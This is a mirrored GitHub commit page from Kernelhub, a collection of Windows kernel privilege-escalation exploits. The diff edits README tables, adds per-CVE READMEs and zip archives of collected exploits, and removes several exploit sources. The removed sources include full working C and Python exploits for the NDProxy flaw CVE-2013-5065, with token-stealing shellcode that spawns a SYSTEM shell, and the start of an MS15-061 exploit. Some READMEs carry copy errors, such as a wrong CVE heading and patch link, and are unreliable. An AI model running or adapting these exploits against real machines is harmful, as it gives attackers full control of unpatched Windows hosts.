github-mirrors/Kernelhub
1
0
Fork 0
mirror of https://mirror.skon.top/github.com/Ascotbe/Kernelhub synced 2026-04-21 13:22:47 +08:00
Code Issues Packages Projects Releases Wiki Activity

fix some bugs🔮

Browse Source
This commit is contained in:
ascotbe
2022-01-20 10:03:37 +08:00
parent 9b5882a3ea
commit 33ccded285
71 changed files with 745 additions and 1867 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
README.CN.md
View File

@@ -38,6 +38,7 @@ http://kernelhub.ascotbe.com
| [CVE-2021-36934](./CVE-2021-36934) | Windows Elevation | Windows 10 |
| [CVE-2021-34527](./TestFailure/CVE-2021-34527) | Windows Print Spooler Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/2022/Server |
| [CVE-2021-33739](./CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server |
| [CVE-2021-31166](./TestFailure/CVE-2021-31166) | HTTP Protocol Stack | Windows 10/Server |
| [CVE-2021-26868](./CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server |
| [CVE-2021-21551](./TestFailure/CVE-2021-21551) | None | None |
| [CVE-2021-1732](./CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server |
@@ -79,7 +80,6 @@ http://kernelhub.ascotbe.com
| [CVE-2018-8440](./TestFailure/CVE-2018-8440) | Windows ALPC Elevation | Windows 7/8/10/2008/2012/2016 |
| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation | Windows 7/2008 |
| [CVE-2018-1038](./TestFailure/CVE-2018-1038) | Windows Kernel Elevation | Windows 7/2008 |
| [CVE-2018-0743](./TestFailure/CVE-2018-0743) | Windows Subsystem for Linux Elevation | Windows 10/2016 |
| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 |
| [CVE-2018-0886](./TestFailure/CVE-2018-0886) | CredSSP Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/Server |
| [CVE-2018-0824](./TestFailure/CVE-2018-0824) | COM for Windows Remote Code Execution | Windows 7/8/10/2008/2012/2016/Server |
@@ -214,11 +214,11 @@ http://kernelhub.ascotbe.com
| CVE-2011-0045| CVE-2011-1237| CVE-2013-0008| CVE-2013-1300| CVE-2013-5065|
| CVE-2014-6321| CVE-2014-6324| CVE-2015-0002| CVE-2015-0062| CVE-2015-1725|
| CVE-2016-3309| CVE-2017-0005| CVE-2017-0100| CVE-2017-0263| CVE-2017-11783|
| CVE-2017-8465| CVE-2018-0743| CVE-2018-0824| CVE-2018-0886| CVE-2018-1038|
| CVE-2018-8440| CVE-2019-0708| CVE-2019-0859| CVE-2019-0863| CVE-2019-0986|
| CVE-2019-1040| CVE-2019-1215| CVE-2019-1253| CVE-2019-1322| CVE-2019-1422|
| CVE-2020-0624| CVE-2020-0814| CVE-2020-1350| CVE-2020-1362| CVE-2020-17057|
| CVE-2020-17087| CVE-2021-1709| CVE-2021-21551| CVE-2021-34527| CVE-2021-43224|
| CVE-2017-8465| CVE-2018-0824| CVE-2018-0886| CVE-2018-1038| CVE-2018-8440|
| CVE-2019-0708| CVE-2019-0859| CVE-2019-0863| CVE-2019-0986| CVE-2019-1040|
| CVE-2019-1215| CVE-2019-1253| CVE-2019-1322| CVE-2019-1422| CVE-2020-0624|
| CVE-2020-0814| CVE-2020-1350| CVE-2020-1362| CVE-2020-17057| CVE-2020-17087|
| CVE-2021-1709| CVE-2021-21551| CVE-2021-31166| CVE-2021-34527| CVE-2021-43224|
| CVE-2021-43883 |

12
README.md
View File

@@ -33,6 +33,7 @@
| [CVE-2021-36934](./CVE-2021-36934) | Windows Elevation | Windows 10 |
| [CVE-2021-34527](./TestFailure/CVE-2021-34527) | Windows Print Spooler Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/2022/Server |
| [CVE-2021-33739](./CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server |
| [CVE-2021-31166](./TestFailure/CVE-2021-31166) | HTTP Protocol Stack | Windows 10/Server |
| [CVE-2021-26868](./CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server |
| [CVE-2021-21551](./TestFailure/CVE-2021-21551) | None | None |
| [CVE-2021-1732](./CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server |
@@ -74,7 +75,6 @@
| [CVE-2018-8440](./TestFailure/CVE-2018-8440) | Windows ALPC Elevation | Windows 7/8/10/2008/2012/2016 |
| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation | Windows 7/2008 |
| [CVE-2018-1038](./TestFailure/CVE-2018-1038) | Windows Kernel Elevation | Windows 7/2008 |
| [CVE-2018-0743](./TestFailure/CVE-2018-0743) | Windows Subsystem for Linux Elevation | Windows 10/2016 |
| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 |
| [CVE-2018-0886](./TestFailure/CVE-2018-0886) | CredSSP Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/Server |
| [CVE-2018-0824](./TestFailure/CVE-2018-0824) | COM for Windows Remote Code Execution | Windows 7/8/10/2008/2012/2016/Server |
@@ -210,11 +210,11 @@ The following numbers are all CVEs that failed to pass the recurrence test after
| CVE-2011-0045| CVE-2011-1237| CVE-2013-0008| CVE-2013-1300| CVE-2013-5065|
| CVE-2014-6321| CVE-2014-6324| CVE-2015-0002| CVE-2015-0062| CVE-2015-1725|
| CVE-2016-3309| CVE-2017-0005| CVE-2017-0100| CVE-2017-0263| CVE-2017-11783|
| CVE-2017-8465| CVE-2018-0743| CVE-2018-0824| CVE-2018-0886| CVE-2018-1038|
| CVE-2018-8440| CVE-2019-0708| CVE-2019-0859| CVE-2019-0863| CVE-2019-0986|
| CVE-2019-1040| CVE-2019-1215| CVE-2019-1253| CVE-2019-1322| CVE-2019-1422|
| CVE-2020-0624| CVE-2020-0814| CVE-2020-1350| CVE-2020-1362| CVE-2020-17057|
| CVE-2020-17087| CVE-2021-1709| CVE-2021-21551| CVE-2021-34527| CVE-2021-43224|
| CVE-2017-8465| CVE-2018-0824| CVE-2018-0886| CVE-2018-1038| CVE-2018-8440|
| CVE-2019-0708| CVE-2019-0859| CVE-2019-0863| CVE-2019-0986| CVE-2019-1040|
| CVE-2019-1215| CVE-2019-1253| CVE-2019-1322| CVE-2019-1422| CVE-2020-0624|
| CVE-2020-0814| CVE-2020-1350| CVE-2020-1362| CVE-2020-17057| CVE-2020-17087|
| CVE-2021-1709| CVE-2021-21551| CVE-2021-31166| CVE-2021-34527| CVE-2021-43224|
| CVE-2021-43883 |

2
TestFailure/CVE-2005-1983/README.md
View File

@@ -23,7 +23,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2005-1983
#### 项目来源
-
- None
#### 分析文章
- https://blog.csdn.net/tomqq/article/details/1951128

2
TestFailure/CVE-2005-1983/README_EN.md
View File

@@ -23,7 +23,7 @@ The vulnerability does not test, the root directory is stored in the network col
#### ProjectSource
-
- None
#### Analyse

2
TestFailure/CVE-2009-0079/README.md
View File

@@ -27,7 +27,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2009-0079
#### 项目来源
-
- None
#### 分析文章

2
TestFailure/CVE-2009-0079/README_EN.md
View File

@@ -23,7 +23,7 @@ The vulnerability does not test, the root directory is stored in the network col
#### ProjectSource
-
- None
#### Analyse

2
TestFailure/CVE-2010-2554/README.md
View File

@@ -27,4 +27,4 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-2554
#### 项目来源
-
- None

2
TestFailure/CVE-2010-2554/README_EN.md
View File

@@ -27,4 +27,4 @@ The vulnerability does not test, the root directory is stored in the network col
#### ProjectSource
-
- None

BIN
TestFailure/CVE-2011-0045/CVE-2011-0045.zip Normal file
View File

Binary file not shown.

12
TestFailure/CVE-2011-0045/README.md
View File

@@ -10,9 +10,19 @@
| ---------- | ---------------- | ------- | ------ | ------ |
| Windows Xp | | | SP3 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-0045
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- https://blog.csdn.net/QEver/article/details/6227415

34
TestFailure/CVE-2011-0045/README_EN.md Normal file
View File

@@ -0,0 +1,34 @@
### CVE-2011-0045
#### Describe
The Trace Events functionality in the kernel in Microsoft Windows XP SP3 does not properly perform type conversion, which causes integer truncation and insufficient memory allocation and triggers a buffer overflow, which allows local users to gain privileges via a crafted application, related to WmiTraceMessageVa, aka "Windows Kernel Integer Truncation Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ---------- | ---------------- | ------- | ------ | ------ |
| Windows Xp | | | SP3 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-0045
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- https://blog.csdn.net/QEver/article/details/6227415
- https://www.geek-share.com/detail/2510409740.html
- https://bbs.pediy.com/thread-130487.htm

BIN
TestFailure/CVE-2013-0008/CVE-2013-0008.zip Normal file
View File

Binary file not shown.

12
TestFailure/CVE-2013-0008/README.md
View File

@@ -18,6 +18,16 @@
| Windows Server 2012 | | | | |
| Windows Vista | | | SP2 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1215
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None

36
TestFailure/CVE-2013-0008/README_EN.md Normal file
View File

@@ -0,0 +1,36 @@
### CVE-2013-0008
#### Describe
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | | |
| Windows 7 | | | SP1 | |
| Windows 8 | | | | |
| Windows Rt | | | | |
| Windows Server 2008 | | | SP2 | |
| Windows Server 2008 | | R2 | | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-0008
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None

216
TestFailure/CVE-2013-5065/CVE-2013-5065.c
View File

@@ -1,216 +0,0 @@
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call managers
# to the Telephony Application Programming Interfaces (TAPI)
# services.
# The vulnerability is caused when the NDProxy.sys kernel
# component fails to properly validate input.
# An attacker who successfully exploited this vulnerability
# could run arbitrary code in kernel mode (i.e. with SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the existing shell
# (i.e. exploit usable via a remote shell)
# Exploit compiling:
# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
# Exploit prerequisites:
# - low privilege access to the target (remote shell or RDP)
# - target not patched (KB2914368 not installed)
# - service "Routing and Remote Access" running on the target
# - "Power User" user group can start and stop services
# - > sc query remoteaccess
# - > sc start remoteaccess
################################################################
# Thanks to:
# Andy (C PoC - Win XP SP3)
# ryujin (Python PoC - Win XP SP3)
################################################################
# References:
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
# https://www.exploit-db.com/exploits/30014/
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
################################################################
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
typedef struct {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef DWORD NTSTATUS;
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
static VOID InitFirstPage (void)
{
PVOID BaseAddress;
ULONG RegionSize;
NTSTATUS ReturnCode;
FARPROC NtAllocateVirtualMemory;
NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
RegionSize = 0xf000;
BaseAddress = (PVOID) 0x00000001;
ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (ReturnCode != 0)
{
fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
fprintf (stderr, " Error code: %#X\n", ReturnCode);
fflush (stderr);
ExitProcess (1);
}
fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
FillMemory (BaseAddress, RegionSize, 0x41);
return;
}
int exploit (unsigned char *shellcode)
{
DWORD writtenBytes;
int returnValue;
InitFirstPage ();
unsigned char *shellcodeBuffer;
shellcodeBuffer = (char *) malloc (400);
memset (shellcodeBuffer, (int) "xCC", 400);
memcpy (shellcodeBuffer, shellcode, 112);
returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
if (returnValue == 0)
{
printf ("[-] Attempt to map memory_write failed\n");
printf (" Error code: %d\n", GetLastError ());
exit(1);
}
HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
{
printf ("[-] Creating a device handle on NDProxy failed\n");
printf (" Error code: %d\n", GetLastError());
exit (0);
}
DWORD inputBuffer [0x15] = {0};
DWORD returnedBytes = 0;
*(inputBuffer + 5) = 0x7030125;
*(inputBuffer + 7) = 0x34;
DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
CloseHandle (ndProxyDeviceHandle);
system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
return 0;
}
int main (int argc, char **argv)
{
if (argc != 2)
{
printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
printf (" supported OS_TYPE:\n");
printf (" XP - Windows XP SP3 x86\n");
printf (" 2k3 - Windows 2003 SP2 x86\n");
printf ("[*] Note: the service \"Routing and Remote Access\"\n");
printf (" must be running on the target machine\n");
exit (0);
}
else
{
if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
{
unsigned char shellcodeXP[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
exploit (shellcodeXP);
}
else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
{
unsigned char shellcode2k3[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
exploit (shellcode2k3);
}
else
{
printf ("[-] Invalid argument\n");
printf (" Argument used: %s\n", argv[1]);
exit(0);
}
}
}

BIN
TestFailure/CVE-2013-5065/CVE-2013-5065.exe
View File

Binary file not shown.

80
TestFailure/CVE-2013-5065/CVE-2013-5065.py
View File

@@ -1,80 +0,0 @@
# NDPROXY Local SYSTEM privilege escalation
# http://www.offensive-security.com
# Tested on Windows XP SP3
# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/
# Original crash ... null pointer dereference
# Access violation - code c0000005 (!!! second chance !!!)
# 00000038 ?? ???
from ctypes import *
from ctypes.wintypes import *
import os, sys
kernel32 = windll.kernel32
ntdll = windll.ntdll
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
NULL = 0x0
OPEN_EXISTING = 0x3
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_READ = 0x0010
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
MEM_FREE = 0x00010000
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = 2097151
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
baseadd = c_int(0x00000001)
MEMRES = (0x1000 | 0x2000)
MEM_DECOMMIT = 0x4000
PAGEEXE = 0x00000040
null_size = c_int(0x1000)
STATUS_SUCCESS = 0
def log(msg):
print msg
def getLastError():
"""[-] Format GetLastError"""
buf = create_string_buffer(2048)
if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
kernel32.GetLastError(), 0,
buf, sizeof(buf), NULL):
log(buf.value)
else:
log("[-] Unknown Error")
print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
print "[*] Vulnerability found in the wild"
print "[*] Coded by Offensive Security"
tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24)
InBuf = c_char_p(tmp)
dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE)
if dwStatus != STATUS_SUCCESS:
print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus
getLastError()
written = c_ulong()
sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh))
alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written))
if alloc == 0:
print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc
getLastError()
dwRetBytes = DWORD(0)
DEVICE_NAME = "\\\\.\\NDProxy"
hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None)
if hdev == -1:
print "[-] Couldn't open the device... :("
sys.exit()
kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0)
kernel32.CloseHandle(hdev)
print "[+] Spawning SYSTEM Shell..."
os.system("start /d \"C:\\windows\\system32\" cmd.exe")

BIN
TestFailure/CVE-2013-5065/CVE-2013-5065.zip Normal file
View File

Binary file not shown.

12
TestFailure/CVE-2013-5065/README.md
View File

@@ -12,9 +12,19 @@
| Windows Xp | | | SP2 | |
| Windows Xp | | | SP3 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-5065
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- https://bbs.pediy.com/thread-182135.htm

34
TestFailure/CVE-2013-5065/README_EN.md Normal file
View File

@@ -0,0 +1,34 @@
### CVE-2019-1215
#### Describe
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows Server 2003 | | | SP2 | |
| Windows Xp | | | SP2 | |
| Windows Xp | | | SP3 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1215
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- https://bbs.pediy.com/thread-182135.htm

BIN
TestFailure/CVE-2014-6321/CVE-2014-6321.zip Normal file
View File

Binary file not shown.

12
TestFailure/CVE-2014-6321/README.md
View File

@@ -20,9 +20,19 @@ Schannel允许远程攻击者通过精心设计的数据包远程执行代码
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6321
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- http://bobao.360.cn/learning/detail/114.html

44
TestFailure/CVE-2014-6321/README_EN.md Normal file
View File

@@ -0,0 +1,44 @@
### CVE-2014-6321
#### Describe
Schannel in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via crafted packets, aka "Microsoft Schannel Remote Code Execution Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | SP1 | |
| Windows 8 | | | | |
| Windows 8.1 | | | | |
| Windows Rt | | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2003 | | | SP2 | |
| Windows Server 2008 | | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6321
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- http://bobao.360.cn/learning/detail/114.html
- https://wooyun.js.org/drops/CVE-2014-6321%20schannel%E5%A0%86%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html
- https://www.freebuf.com/vuls/52110.html

BIN
TestFailure/CVE-2014-6324/CVE-2014-6324.zip Normal file
View File

Binary file not shown.

12
TestFailure/CVE-2014-6324/README.md
View File

@@ -18,9 +18,19 @@
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6324
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- https://naykcin.top/2020/01/12/ms14068/

41
TestFailure/CVE-2014-6324/README_EN.md Normal file
View File

@@ -0,0 +1,41 @@
### CVE-2014-6324
#### Describe
The Kerberos Key Distribution Center (KDC) in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka "Kerberos Checksum Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | | |
| Windows 8 | | | | |
| Windows 8.1 | | | | |
| Windows Server 2003 | | | SP2 | |
| Windows Server 2008 | | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6324
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- https://naykcin.top/2020/01/12/ms14068/
- https://www.cnblogs.com/feizianquan/p/11760564.html

12
TestFailure/CVE-2015-0002/README.md
View File

@@ -17,9 +17,19 @@
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0002
```
#### 利用方式
有源码,未知利用
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- https://googleprojectzero.blogspot.com/2015/02/a-tokens-tale_9.html

38
TestFailure/CVE-2015-0002/README_EN.md Normal file
View File

@@ -0,0 +1,38 @@
### CVE-2015-0002
#### Describe
The AhcVerifyAdminContext function in ahcache.sys in the Application Compatibility component in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not verify that an impersonation token is associated with an administrative account, which allows local users to gain privileges by running AppCompatCache.exe with a crafted DLL file, aka MSRC ID 20544 or "Microsoft Application Compatibility Infrastructure Elevation of Privilege Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | SP1 | |
| Windows 8 | | | | |
| Windows 8.1 | | | | |
| Windows Rt | | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0002
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- https://googleprojectzero.blogspot.com/2015/02/a-tokens-tale_9.html
- http://www.vuln.cn/6702

2
TestFailure/CVE-2015-0062/README_EN.md
View File

@@ -29,5 +29,5 @@ The vulnerability does not test, the root directory is stored in the network col
#### ProjectSource
-
- None

455
TestFailure/CVE-2015-1725/CVE-2015-1725.cpp
View File

@@ -1,455 +0,0 @@
#include <windows.h>
#include<stdio.h>
/*
Exploiting MS15-061 with reverse engineering Win32k.sys by
steps :
1: hook PEB callback Function
2: trigger vulnerability ( make proper Window to lead vulnerable function)
3: replace fake object with NtUserDefSetText in Desktop heap inside PEB callback
4: fake object with save exit buffer(0x0c0c0c0c) and pointer to tagWND
5: do it until bServerSideWindowProc is set
mail : Firozimaysam@gmail.com
twitter : https://twitter.com/R00tkitSMM
*/
// TODO: check OS version , Code refactoring
/*
ref:
https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/08/2015-08-27_-_ncc_group_-_exploiting_ms15_061_uaf_-_release.pdf
http://www.mista.nu/research/mandt-win32k-slides.pdf
https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/
*/
typedef struct _HANDLEENTRY{
PVOID phead;
